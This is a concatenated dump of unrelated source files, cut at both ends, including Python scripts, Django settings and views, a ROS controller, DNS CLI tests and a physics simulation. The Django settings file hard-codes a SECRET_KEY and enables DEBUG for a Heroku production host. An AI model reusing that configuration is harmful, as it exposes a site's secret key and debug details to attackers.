train_file))\nnum_train = len(samples)\nindex = 0\nprint(num_train)\npart_size = int(num_train / num_part)\nfor part in range(num_part):\n with open(os.path.join(train_dir, 'part-00{}'.format(part + 1)), 'w') as f:\n for j in range(0, part_size):\n f.write(samples[index])\n index += 1\n\nprint('generating test data...')\nsamples = get_data(os.path.join(data_dir, train_file))\nnum_test = len(samples)\nwith 
open(os.path.join(test_dir, 'part-001'), 'w') as f:\n    for i in range(0, num_test):\n        f.write(samples[i])\n\nprint('done.')\n","sub_path":"ps-lite/lr/data/gen_data.py","file_name":"gen_data.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"153572846","text":"import os\nimport dotenv\nimport dj_database_url\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nDOTENV = os.path.join(BASE_DIR, '.env')\nif os.path.isfile(DOTENV):\n    dotenv.load_dotenv(DOTENV)\n\n# NOTE: a hard-coded SECRET_KEY with DEBUG = True is unsafe outside local development.\nSECRET_KEY = 'a%5cb20uhnfwol1ipk6$i$4*-a+#km1(-6#ri_gp9e1zvy6u*+'\n\nDEBUG = True\n\nALLOWED_HOSTS = [\n    'limelight-dance-core.herokuapp.com',\n]\n\nINSTALLED_APPS = [\n    'api',\n    'rest_framework',\n    'corsheaders',\n]\n\nMIDDLEWARE = [\n    'corsheaders.middleware.CorsMiddleware',\n]\n\nROOT_URLCONF = 'core.urls'\n\nWSGI_APPLICATION = 'core.wsgi.application'\n\nDATABASES = {}\nDATABASES['default'] = dj_database_url.config(conn_max_age=600)\n\nCORS_ORIGIN_WHITELIST = [\n    'https://limelight-dance-ui.herokuapp.com',\n    'http://limelight-dance-ui.herokuapp.com',\n    'http://localhost:8080',\n]\n","sub_path":"core/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"292951254","text":"a = {\n    1: 1,\n    2: 1,\n}\n\ndef fib(n):\n    if n in a:\n        return a[n]\n    else:\n        x = fib(n - 1) + fib(n - 2)\n        a[n] = x\n        return x\n\ndef main():\n    n = int(input())\n    print(fib(n))\n\nif __name__ == \"__main__\":\n    main()","sub_path":"stepik-217/ch-2-ch-3/ch-2-2-step-6.py","file_name":"ch-2-2-step-6.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"401405117","text":"# assert r.json()['code'] == login_data['expect']['code']\n# assert r.json()['status'] == login_data['expect']['status']\n# assert r.json()['msg'] == login_data['expect']['msg']\nfrom pytest_check import check\n\n\ndef equal(real,expect,keys):\n    ks = keys.split(',')\n    for k in ks:\n        r = str(real.get(k))\n        e = str(expect.get(k))\n        try:\n            check.equal(r,e)\n            print(f\"check of {k} passed\")\n        except Exception as err:  # renamed from 'e', which shadowed the expected value bound above\n            print(f\"check of {k} failed: {err}\")","sub_path":"zonghe/caw/Check.py","file_name":"Check.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"649830156","text":"#!/usr/bin/env python\n\nimport os\nimport rospy\nimport numpy as np\nfrom nav_msgs.msg import Odometry\nfrom std_msgs.msg import Float32, Int16\nimport math\n\nfirst_run = True\n\nsteer_pub = None\nspeed_pub = None\nstart_stop_pub = None\ndir = os.path.dirname(os.path.abspath(__file__))\nlane1_matrix = np.load(os.path.join(dir, './matrixDynamic_lane1.npy'))\nlane2_matrix = np.load(os.path.join(dir, './matrixDynamic_lane2.npy'))\nmeter2res_factor = 10\n\nforward_speed = -150\nbackward_speed = 150\ncalibrated_forward_angle = 100\n\nkp = 6\nmax_steering_angle = np.pi / 4\n\nspeed = None\nspeed_change_threshold = 0.1\n\n\nlast_speed = None\nlast_steering = None\n\nackerman_angles = [45, 0, -45]\nsteering_angles = [0, 100, 179]\n# polynomial of 3rd degree to best map the steering angle\n# as explained in the lectures, autos tend to have a more precise steering near the straight ahead angle,\n# so more like\n#\n# *\n#  *\n#   *\n#    *\n#     *\n#      * * *\n#           *\n#            *\n#             *\n# * Well at least I tried ^^, note my awesome ASCII function drawing 
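Each line gen_data.py above writes is libsvm-style, 'label index:value ...'; one hypothetical 3-dimensional sample assembled the same way:

import random

random.seed(0)  # seeded only to make the sketch reproducible
dimension = 3
line = str(random.randint(0, 1)) + ' ' + ' '.join(
    [str(x) + ':' + str(random.uniform(0, 10)) for x in range(dimension)])
print(line)  # e.g. '1 0:7.57... 1:4.25... 2:2.58...'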
skills\nsteer_map_p = np.poly1d(np.polyfit(ackerman_angles, steering_angles, 3))\n\n\ndef get_calibrated_steering(angle):\n return steer_map_p(angle)\n\n\ndef get_orientation_angle(quaternion):\n return np.arccos(quaternion.w) * 2 * np.sign(quaternion.z)\n\n\ndef get_x_y_orientation(odom_msg):\n pose = odom_msg.pose.pose\n position = pose.position\n orientation = pose.orientation\n\n return position.x, position.y, get_orientation_angle(orientation)\n\n\ndef unpack_msg(odom_msg):\n return get_x_y_orientation(odom_msg)\n\n\ndef get_steering_speed_fxy_car_map(x, y, yaw):\n global speed\n # rospy.loginfo('x: {}; y: {}'.format(x, y))\n\n x_in_map = int(np.round(x * meter2res_factor))\n y_in_map = int(np.round(y * meter2res_factor))\n\n if x_in_map < 0:\n x_in_map = 0\n elif x_in_map >= lane1_matrix.shape[0]:\n x_in_map = lane1_matrix.shape[0] - 1\n\n if y_in_map < 0:\n y_in_map = 0\n elif y_in_map >= lane1_matrix.shape[1]:\n y_in_map = lane1_matrix.shape[1] - 1\n\n f_x_map, f_y_map = lane1_matrix[x_in_map, y_in_map, :]\n f_x_car = np.cos(yaw) * f_x_map + np.sin(yaw) * f_y_map\n f_y_car = - np.sin(yaw) * f_x_map + np.cos(yaw) * f_y_map\n\n if (speed is None and f_x_car >= 0) or f_x_car > speed_change_threshold:\n speed = forward_speed\n elif (speed is None and f_x_car < 0) or f_x_car < -speed_change_threshold:\n speed = backward_speed\n\n # formula from assignment, kp unchanged (for now)\n steering = kp * np.arctan(f_y_car / (2.5 * f_x_car))\n\n # the car can only steer max_steering_angle amount\n # so make sure we don't give any other commands\n if steering > max_steering_angle:\n steering = max_steering_angle\n elif steering < - max_steering_angle:\n steering = - max_steering_angle\n\n if speed == backward_speed:\n if f_y_car > 0:\n steering = -max_steering_angle\n if f_y_car < 0:\n steering = max_steering_angle\n\n # should get a mapping to the steering angle of the car\n # we used linear interpolation to map [-45, 45] to [0,179]\n # also added a point 0, 100 as the car we used was heading straight with a control angle of 100\n # note: if the function is using something else than 100, probably we changed the car at some point :D\n control_steering = get_calibrated_steering(np.degrees(steering))\n return control_steering, speed, f_x_car, f_y_car, f_x_map, f_y_map, steering\n\n\ndef get_steering_and_speed(x, y, yaw):\n return get_steering_speed_fxy_car_map(x, y, yaw)[:2]\n\n\ndef kalman_callback(odom_msg):\n global speed, first_run, last_speed, last_steering\n\n # rospy.loginfo('in callback')\n\n if first_run:\n first_run = False\n start_stop_pub.publish(0)\n else:\n pass\n\n # to plot circle\n # steer_pub.publish(last_steering)\n # speed_pub.publish(last_speed)\n # return\n\n x, y, yaw = unpack_msg(odom_msg)\n\n control_steering, speed = get_steering_and_speed(x, y, yaw)\n\n # need them to complete 1. 
exercise, driving in a circle\n    # and keep publishing the first values\n    last_speed = speed\n    last_steering = control_steering\n\n    steer_pub.publish(control_steering)\n    speed_pub.publish(speed)\n\n    # useful debugging logs\n    # rospy.loginfo('controlling; speed: {}; angle: {}'.format(speed, control_steering))\n    # rospy.loginfo('f_x: {}'.format(f_x_car))\n    # rospy.loginfo('steering: {}'.format(control_steering))\n    # rospy.loginfo('f_x: {}; f_y: {}'.format(f_x, f_y))\n\n\ndef init():\n    global steer_pub, speed_pub, start_stop_pub\n\n    rospy.init_node(\"path_controller\", anonymous=True)\n\n    rospy.Subscriber('/assignment6/odom', Odometry, kalman_callback)\n    steer_pub = rospy.Publisher('/manual_control/steering', Int16, queue_size=10)\n    speed_pub = rospy.Publisher('/manual_control/speed', Int16, queue_size=10)\n    start_stop_pub = rospy.Publisher('/manual_control/stop_start', Int16, queue_size=10)\n\n\nif __name__ == '__main__':\n    try:\n        init()\n        rospy.spin()\n    except rospy.ROSInterruptException:\n        rospy.loginfo(\"interrupt\")\n","sub_path":"src/task10_path_following/scripts/path_controller.py","file_name":"path_controller.py","file_ext":"py","file_size_in_byte":5316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"405656956","text":"#!/usr/bin/env python2.6\nimport sys\nsys.stdout = sys.stderr\nfrom gnr.web.gnrwsgisite import GnrWsgiSite\nsite = GnrWsgiSite(__file__)\n\ndef application(environ,start_response):\n    return site(environ,start_response)\n\nif __name__ == '__main__':\n    from gnr.web.server import NewServer\n    server=NewServer(__file__)\n    server.run()","sub_path":"instances/learn/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"314705512","text":"from tkinter import *\n## Function declarations\ndef selectMemberData():\n    global inputEmail\n    print(str(inputEmail.get()))\n## Global variables\ninputEmail=\"\"\n\n## Main code\ndef main(login):\n    global inputEmail  # rebind the module-level name so selectMemberData sees the Entry widget\n    window = Tk()\n\n    window.geometry('400x400')\n\n    text1 = Label(window, text=login)\n    text1.pack()\n\n    edtFrame = Frame(window)\n    edtFrame.pack()\n\n    inputEmail = Entry(edtFrame, width = 10); inputEmail.pack(padx=10, pady=10)\n    btnInsert = Button(edtFrame, text=\"Login\",command=selectMemberData)\n    btnInsert.pack(padx=10,pady=10)\n\n    window.mainloop()\n","sub_path":"[5] 빅데이터 처리시스템 개발/pythonProject Ver10.12/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"71450381","text":"'''\nManage command for generating a list of test objects, e.g. to synchronize\nreal content from production to QA. Takes a text file as input with a\nlist of volume pids and outputs a list of all associated pids for those\nobjects - books, volumes, and pages (if any). Any non-volume or\nnon-existent objects will be skipped; use a higher verbosity level to\nsee details.\n\nSample usage::\n\n    python manage.py find_test_pids vol_pids.txt --calculate-size > vol_assoc_pids.txt\n\n\n'''\nfrom collections import defaultdict\nimport time\n\nfrom django.template.defaultfilters import filesizeformat, pluralize\nfrom django.core.management.base import BaseCommand\nfrom eulfedora.server import Repository\n\nfrom readux.books.models import Volume\nfrom readux.fedora import ManagementRepository\n\n\nclass Command(BaseCommand):\n    '''Generate a list of pids for testing purposes. 
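The cubic steering fit in path_controller.py above is pinned by only three calibration points, so numpy raises a RankWarning (a quadratic would already be uniquely determined); evaluating the fit at those points shows it still interpolates them:

import numpy as np

ackerman_angles = [45, 0, -45]
steering_angles = [0, 100, 179]
steer_map = np.poly1d(np.polyfit(ackerman_angles, steering_angles, 3))

for angle in ackerman_angles:
    # Recovers 0, 100 and 179 up to floating-point noise.
    print(angle, round(float(steer_map(angle)), 1))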
Takes a text file\n    as input with a list of Volume pids, one per line. Generates a list\n    of all associated pids (books and pages), and can optionally\n    calculate and report total approximate size of all objects listed.\n    '''\n    help = __doc__\n\n    missing_args_message = 'Please specify input file with list of Volume pids'\n\n    #: default verbosity level\n    v_normal = 1\n\n    def add_arguments(self, parser):\n        # Positional argument for input file (required)\n        parser.add_argument('input_file',\n            help='Input file with a list of volume pids')\n        # optional arguments\n        parser.add_argument('--calculate-size',\n            action='store_true',\n            dest='calculate_size',\n            default=False,\n            help='Calculate total size of volumes and associated objects')\n\n    def handle(self, *args, **options):\n        # expects a plain text file with a list of pids,\n        # one per line\n        start = time.time()\n        with open(options['input_file']) as infile:\n            pids = [line.rstrip('\\n') for line in infile]\n\n        # if size calculation is requested, we need credentials to access\n        # datastream metadata\n        if options['calculate_size']:\n            repo = ManagementRepository()\n        # otherwise, guest access should be sufficient\n        else:\n            repo = Repository()\n\n        total_size = 0\n        stats = defaultdict(int)\n        book_pids = set()\n        for pid in pids:\n            vol = repo.get_object(pid, Volume)\n            if not vol.exists:\n                stats['skipped'] += 1\n                if options['verbosity'] > self.v_normal:\n                    self.stderr.write('%s does not exist, skipping' % pid)\n                continue\n            if not vol.is_a_volume:\n                stats['skipped'] += 1\n                if options['verbosity'] > self.v_normal:\n                    self.stderr.write('%s does not appear to be a Volume, skipping' % pid)\n                continue\n\n            stats['volumes'] += 1\n            # output volume pid & associated book/page pids\n            self.stdout.write(vol.pid)\n            if options['calculate_size']:\n                # get_object_size() covers every version of every datastream,\n                # so each volume is counted exactly once\n                total_size += self.get_object_size(vol)\n\n            # books are potentially repeatable\n            # (could be associated with multiple volumes)\n            # only output a book pid once\n            if vol.book.pid not in book_pids:\n                self.stdout.write(vol.book.pid)\n                book_pids.add(vol.book.pid)\n\n                if options['calculate_size']:\n                    if vol.book.exists:\n                        total_size += self.get_object_size(vol.book)\n                    elif options['verbosity'] > self.v_normal:\n                        self.stderr.write('Book %s associated with Volume %s does not exist' \\\n                            % (vol.book.pid, vol.pid))\n\n            for page in vol.pages:\n                stats['pages'] += 1\n                self.stdout.write(page.pid)\n                if options['calculate_size']:\n                    if page.exists:\n                        total_size += self.get_object_size(page)\n                    elif options['verbosity'] > self.v_normal:\n                        self.stderr.write('Page %s associated with Volume %s does not exist' \\\n                            % (page.pid, vol.pid))\n\n        # output summary after all pids are processed\n        if options['verbosity'] >= self.v_normal:\n            msg = 'Processed %d volume%s (skipped %d); found %d book%s and %d page%s in %.02fs.' % \\\n                (stats['volumes'], pluralize(stats['volumes']),\n                stats['skipped'],\n                len(book_pids), pluralize(book_pids),\n                stats['pages'], pluralize(stats['pages']),\n                time.time() - start)\n\n            # if calculate size was requested, report\n            if options['calculate_size']:\n                # approximate because it does not account for size of the foxml\n                msg += ' Approximate total size is %s.' 
% filesizeformat(total_size)\n            # Using stderr here so pid list can be output to a file\n            self.stderr.write(msg)\n\n    def get_object_size(self, obj):\n        # calculate approximate size for a fedora object:\n        # given an eulfedora digital object,\n        # total up the size for all versions of all datastreams\n        size = 0\n        for ds in obj.ds_list:\n            dsobj = obj.getDatastreamObject(ds)\n            for version in dsobj.history().versions:\n                size += version.size\n        return size\n","sub_path":"readux/books/management/commands/find_test_pids.py","file_name":"find_test_pids.py","file_ext":"py","file_size_in_byte":5629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"548461922","text":"import os\n# from math import sqrt\n\ndef media(lista):\n    # sum the elements and return their average\n    soma = 0\n    for j in lista:\n        soma += j\n    return soma / len(lista)  # (original note: could return two elements [x, y])\n\nos.system(\"cls\")\njam = []\n\nn = int(input(\"How many elements will be read? \"))\n\nfor j in range(0, n):\n    element = float(input(\"Enter number \" + str(j) + \" \"))\n    jam.append(element)\n\nprint(\"The average is \" + str(media(jam)))\n\n","sub_path":"4_Aula/Media.py","file_name":"Media.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"378969820","text":"from timeit import default_timer as timer\nimport numpy as np\nimport os\nimport Grid\nimport GaussianState\nimport PolaronHamiltonianGaussian\n\nimport sys\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nmatplotlib.rcParams.update({'font.size': 12, 'text.usetex': True})\n\n\n# ----------------------------------------\n# Grid Initialization\n# ----------------------------------------\nk_max = 10\nk_step = 0.1\n\ngrid_space = Grid.Grid(\"3D\")\ngrid_space.init1d('k', k_step, k_max, k_step)\n\n# ----------------------------------------\n# Initialization of the Gaussian state\n# ----------------------------------------\ngs = GaussianState.GaussianState(grid_space)\n\n# ----------------------------------------\n# Initialization of the PolaronHamiltonian\n# ----------------------------------------\n# this code is for an infinite-mass impurity,\n# thus mI and P are not included in the list\n# of parameters\n\nmB = 1\nn0 = 1\ngBB = (4 * np.pi / mB) * 0.065\naIBi = 2.\n\nParams = [aIBi, mB, n0, gBB]\nham = PolaronHamiltonianGaussian.PolaronHamiltonianGaussian(gs, Params)\n\n# ----------------------------------------\n# Real Time evolution with Gaussian State\n# ----------------------------------------\ntMax = 20\ndt = 0.1\n\nstart = timer()\n\ntVec = np.arange(0, tMax, dt)\nNB_Vec = np.zeros(tVec.size, dtype=float)\nZfactor_Vec = np.zeros(tVec.size, dtype=float)\nenergy_vec = np.zeros(tVec.size, dtype=float)\n\nfor ind, t in enumerate(tVec):\n    NB_Vec[ind] = gs.get_PhononNumber()\n    Zfactor_Vec[ind] = gs.get_Zfactor()\n    energy_vec[ind] = gs.get_energy(ham)\n\n    gs.evolve_real_time(dt, ham)\n\n\nend = timer()\n\nprint(end - start)\n\n\n# ----------------------------------------\n# Save data\n# ----------------------------------------\ndata = [ham.Params, tVec, NB_Vec, Zfactor_Vec, energy_vec]\n\ndirpath = os.path.dirname(os.path.realpath(__file__))\nnp.save(dirpath + '/data/gsrt_aIBi:%.2f.npy' % (aIBi), 
data)\n\nprint(energy_vec[-1])\nprint(NB_Vec[-1])\nprint(Zfactor_Vec[-1])\n\n","sub_path":"gaussian_real_time.py","file_name":"gaussian_real_time.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"184431399","text":"import unittest\nimport subprocess\nimport sys\nimport re\nimport random\n\nclass NonZeroExit(Exception):\n pass\n\nclass RegexEqual(object):\n def __init__(self, r):\n self.re = re.compile(r)\n \n def __eq__(self, x):\n return bool(self.re.search(x))\n\nclass CommandsTest(unittest.TestCase):\n def setUp(self):\n # re-use if already created\n self.zone = '%d.example.com' % random.randint(0, sys.maxint)\n self._cmd('create', self.zone, '--comment', 'unittests')\n \n def tearDown(self):\n # clear up\n self._cmd('rrpurge', '--confirm', self.zone)\n self._cmd('delete', self.zone)\n \n def _cmd(self, cmd, *args):\n pargs = ('scripts/cli53', cmd) + args\n p = subprocess.Popen(pargs, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p.wait()\n if p.returncode:\n print >> sys.stderr, p.stderr.read()\n raise NonZeroExit\n return p.stdout.read()\n \n def test_rrcreate(self):\n self._cmd('rrcreate', self.zone, '', 'A', '10.0.0.1')\n self._cmd('rrcreate', self.zone, 'www', 'CNAME', self.zone+'.', '-x 3600')\n self._cmd('rrcreate', self.zone, 'info', 'TXT', 'this is a \"test\"')\n self._cmd('rrcreate', self.zone, 'weighttest1', 'CNAME', self.zone+'.', '-x 60', '-w 0', '-i awsweightzero')\n self._cmd('rrcreate', self.zone, 'weighttest2', 'CNAME', self.zone+'.', '-x 60', '-w 1', '-i awsweightone')\n self._cmd('rrcreate', self.zone, 'weighttest3', 'CNAME', self.zone+'.', '-x 60', '-w 50', '-i awsweightfifty')\n\n output = self._cmd('export', self.zone)\n output = [ x for x in output.split('\\n') if '10.0.0.1' in x or 'CNAME' in x or 'TXT' in x ]\n\n self.assertEqual(\n [\n \"@ 86400 IN A 10.0.0.1\",\n 'info 86400 IN TXT \"this is a \\\\\"test\\\\\"\"',\n \"weighttest1 60 AWS CNAME 0 %s. awsweightzero\" % self.zone,\n \"weighttest2 60 AWS CNAME 1 %s. awsweightone\" % self.zone,\n \"weighttest3 60 AWS CNAME 50 %s. 
awsweightfifty\" % self.zone,\n \"www 3600 IN CNAME %s.\" % self.zone,\n ],\n output\n )\n\n def test_rrdelete(self):\n self._cmd('rrcreate', self.zone, '', 'A', '10.0.0.1')\n self._cmd('rrdelete', self.zone, '', 'A')\n \n def test_rrcreate_replace_latency(self):\n self._cmd('rrcreate', '-i', 'asiacdn', '--region', 'ap-southeast-1', self.zone, 'cdn', 'CNAME', 'asiacdn.com.')\n self._cmd('rrcreate', '-i', 'statescdn', '--region', 'us-west-1', self.zone, 'cdn', 'CNAME', 'uscdn.com.')\n self._cmd('rrcreate', '-i', 'newuscdn', '--region', 'us-west-1', self.zone, 'cdn', 'CNAME', 'newuscdn.com.', '-r')\n","sub_path":"tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"300733471","text":"from datetime import date\nimport json\n\nfrom django.conf import settings\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.db.models import Q\nfrom django.core.serializers import serialize\nfrom django.contrib.sitemaps import Sitemap\n\nfrom emplacement.models import Emplacement, EmplacementTenure\n\nfrom association.models import Association, AssociationTenure\n\nfrom composition.models import Composition\n\nfrom organization.forms import OrganizationBasicsForm, \\\n OrganizationCompositionForm, OrganizationPersonnelForm, \\\n OrganizationEmplacementForm, OrganizationAssociationForm, \\\n OrganizationCreateBasicsForm, OrganizationCreateCompositionForm, \\\n OrganizationCreatePersonnelForm, OrganizationCreateEmplacementForm, \\\n OrganizationCreateAssociationForm, OrganizationMembershipForm, \\\n OrganizationCreateMembershipForm\nfrom organization.models import Organization\n\nfrom location.models import Location\n\nfrom membershipperson.models import MembershipPerson\n\nfrom membershiporganization.models import MembershipOrganization\n\nfrom sfm_pc.templatetags.countries import country_name\nfrom sfm_pc.base_views import BaseUpdateView, BaseCreateView, BaseDetailView, \\\n BaseDeleteView, BaseDeleteRelationshipView\nfrom source.models import Source\n\n\nclass EditButtonsMixin:\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['is_{}_active'.format(self.button)] = True\n return context\n\n\nclass OrganizationDetail(BaseDetailView):\n model = Organization\n template_name = 'organization/view.html'\n slug_field = 'uuid'\n\n def get_sources(self, context):\n sources = set()\n\n sources.update(list(context['organization'].sources.values_list('uuid', flat=True)))\n\n related_entities = (\n 'person_members',\n 'org_members',\n 'memberships',\n 'subsidiaries',\n 'events',\n 'parents',\n )\n\n for relation in related_entities:\n for entity in context[relation]:\n sources.update(list(entity.sources.values_list('uuid', flat=True)))\n\n tenured_relations = (\n 'associations',\n 'emplacements',\n )\n\n seen_relationships = set()\n\n for relation in tenured_relations:\n for tenure in context[relation]:\n relationship = getattr(tenure, relation.rstrip('s'))\n\n if relationship.id in seen_relationships:\n continue\n\n sources.update(list(relationship.sources.values_list('uuid', flat=True)))\n seen_relationships.add(relationship.id)\n\n return Source.objects.filter(uuid__in=sources).order_by('source_url', '-accesspoint__accessed_on')\\\n .distinct('source_url')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n # Determine 
if the user is logged in\n authenticated = self.request.user.is_authenticated\n\n # Commanders of this unit\n context['person_members'] = []\n\n if authenticated:\n person_members = context['organization'].membershippersonorganization_set.all()\n else:\n person_members = context['organization'].membershippersonorganization_set.filter(object_ref__membershippersonmember__value__published=True)\n\n for membership in person_members:\n context['person_members'].append(membership.object_ref)\n\n # Organizational members of this unit\n context['org_members'] = []\n\n if authenticated:\n org_members = context['organization'].membershiporganizationorganization_set.all()\n else:\n org_members = context['organization'].membershiporganizationorganization_set.filter(value__published=True)\n\n if org_members:\n org_members = (mem.object_ref for mem in org_members)\n\n context['org_members'] = sorted(\n org_members,\n key=lambda x: (\n country_name(x.member.get_value().value.division_id.get_value().value),\n x.member.get_value().value.name.get_value().value\n )\n )\n\n # Other units that this unit is a member of\n context['memberships'] = []\n\n if authenticated:\n memberships = context['organization'].membershiporganizationmember_set.all()\n else:\n memberships = context['organization'].membershiporganizationmember_set.filter(object_ref__membershiporganizationorganization__value__published=True)\n\n if memberships:\n memberships = (mem.object_ref for mem in memberships)\n context['memberships'] = sorted(\n memberships,\n key=lambda x: (\n country_name(x.organization.get_value().value.division_id.get_value().value),\n x.organization.get_value().value.name.get_value().value\n )\n )\n\n # Child units\n context['subsidiaries'] = []\n\n if authenticated:\n children = context['organization'].child_organization.all()\n else:\n children = context['organization'].child_organization.filter(object_ref__compositionchild__value__published=True)\n\n for child in children:\n context['subsidiaries'].append(child.object_ref)\n\n # Incidents that this unit perpetrated\n context['events'] = []\n\n if authenticated:\n events = context['organization'].violationperpetratororganization_set.all()\n else:\n events = context['organization'].violationperpetratororganization_set.filter(object_ref__published=True)\n\n for event in events:\n context['events'].append(event.object_ref)\n\n context['emplacements'] = context['organization'].emplacements\n\n site_ids = context['emplacements'].values_list('emplacement__emplacementsite__value')\n\n context['sites'] = serialize(\n 'geojson',\n Location.objects.filter(id__in=site_ids),\n geometry_field='geometry'\n )\n\n context['associations'] = context['organization'].associations\n\n area_ids = context['associations'].values_list('association__associationarea__value')\n\n context['areas'] = serialize(\n 'geojson',\n Location.objects.filter(id__in=area_ids),\n geometry_field='geometry'\n )\n\n context['parents'] = []\n context['parents_list'] = []\n\n if authenticated:\n parents = context['organization'].parent_organization.all()\n else:\n parents = context['organization'].parent_organization.filter(object_ref__compositionparent__value__published=True)\n\n # \"parent\" is a CompositionChild\n for parent in parents:\n\n context['parents'].append(parent.object_ref.parent.get_value().value)\n\n org_data = {'when': '', 'url': ''}\n\n when = None\n if parent.object_ref.enddate.get_value():\n # Make the query using the raw date string, to accomodate\n # fuzzy dates\n when = 
repr(parent.object_ref.enddate.get_value().value)\n org_data['when'] = when\n\n # Display a formatted date\n org_data['display_date'] = str(parent.object_ref.enddate.get_value())\n\n kwargs = {'org_id': str(context['organization'].uuid)}\n ajax_route = 'command-chain'\n if when:\n kwargs['when'] = when\n ajax_route = 'command-chain-bounded'\n\n command_chain_url = reverse(ajax_route, kwargs=kwargs)\n\n org_data['url'] = command_chain_url\n\n context['parents_list'].append(org_data)\n\n context['sources'] = self.get_sources(context)\n\n return context\n\n\nclass OrganizationEditView(EditButtonsMixin, BaseUpdateView):\n model = Organization\n slug_field = 'uuid'\n slug_field_kwarg = 'organization_id'\n slug_url_kwarg = 'organization_id'\n context_object_name = 'organization'\n button = 'basics'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context['organization'] = self.get_reference_organization()\n\n return context\n\n def get_reference_organization(self):\n return Organization.objects.get(uuid=self.kwargs['organization_id'])\n\n def get_success_url(self):\n organization_id = self.kwargs['organization_id']\n\n # when saving and continuing, always return to the page we were on\n if self.request.POST.get('_continue'):\n return self.request.path\n else:\n return reverse('view-organization', kwargs={'slug': organization_id})\n\n def get_cancel_url(self):\n return reverse('view-organization', kwargs={'slug': self.kwargs['organization_id']})\n\n\nclass OrganizationCreateView(BaseCreateView):\n\n def get_success_url(self):\n organization_id = self.kwargs['organization_id']\n\n # when saving and continuing, redirect to the edit view for the new object\n if self.request.POST.get('_continue'):\n if not hasattr(self, 'edit_url_name'):\n return reverse('view-organization', args=[organization_id])\n else:\n return reverse(self.edit_url_name, kwargs={\n 'organization_id': organization_id,\n 'pk': self.object.pk\n })\n else:\n return reverse('view-organization', args=[organization_id])\n\n def get_cancel_url(self):\n return reverse('view-organization', kwargs={'slug': self.kwargs['organization_id']})\n\n\nclass OrganizationDeleteRelationshipView(BaseDeleteRelationshipView):\n\n def get_success_url(self):\n return reverse('create-organization-{}'.format(self.model.__name__.lower()),\n kwargs={'organization_id': self.kwargs['organization_id']})\n\n def get_cancel_url(self):\n organization_id = self.kwargs['organization_id']\n pk = self.kwargs['pk']\n return reverse('edit-organization-{}'.format(self.model.__name__.lower()),\n kwargs={'organization_id': organization_id,\n 'pk': pk})\n\n\nclass OrganizationDeleteView(BaseDeleteView):\n model = Organization\n slug_field = 'uuid'\n slug_field_kwarg = 'organization_id'\n slug_url_kwarg = 'organization_id'\n template_name = 'organization/delete.html'\n context_object_name = 'organization'\n\n def get_cancel_url(self):\n return reverse_lazy('edit-organization', args=[self.kwargs['organization_id']])\n\n def get_success_url(self):\n return reverse('search') + '?entity_type=Organization'\n\n def get_related_entities(self):\n return self.object.related_entities\n\n\nclass OrganizationEditBasicsView(OrganizationEditView):\n template_name = 'organization/edit-basics.html'\n form_class = OrganizationBasicsForm\n button = 'basics'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n def get_form_kwargs(self):\n form_kwargs = super().get_form_kwargs()\n 
form_kwargs['organization_id'] = self.kwargs['organization_id']\n return form_kwargs\n\n\nclass OrganizationCreateBasicsView(OrganizationCreateView):\n model = Organization\n slug_field = 'uuid'\n slug_field_kwarg = 'slug'\n context_object_name = 'organization'\n template_name = 'organization/create-basics.html'\n form_class = OrganizationCreateBasicsForm\n\n def get_success_url(self):\n \"\"\"\n OrganizationCreateBasicsView follows a different success_url pattern than\n the rest of the views that inherit from OrganizationCreateView, so\n override get_success_url().\n \"\"\"\n if self.request.POST.get('_continue'):\n return reverse('edit-organization', args=[self.object.uuid])\n else:\n return reverse('view-organization', args=[self.object.uuid])\n\n # When cancelling the creation of a new organization, take the \n # user back to the search page for organizations\n def get_cancel_url(self):\n return '{}?entity_type=Organization'.format(reverse('search'))\n\n\nclass OrganizationEditCompositionView(OrganizationEditView):\n template_name = 'organization/edit-composition.html'\n form_class = OrganizationCompositionForm\n model = Composition\n context_object_name = 'current_composition'\n slug_field_kwarg = 'pk'\n button = 'relationships'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n parents = Q(compositionparent__value=context['organization'])\n children = Q(compositionchild__value=context['organization'])\n\n context['compositions'] = Composition.objects.filter(parents | children)\n context['memberships'] = MembershipOrganization.objects.filter(membershiporganizationmember__value=context['organization'])\n\n return context\n\n\nclass OrganizationCreateCompositionView(EditButtonsMixin, OrganizationCreateView):\n template_name = 'organization/create-composition.html'\n form_class = OrganizationCreateCompositionForm\n model = Composition\n context_object_name = 'current_composition'\n slug_field_kwarg = 'pk'\n button = 'relationships'\n edit_url_name = 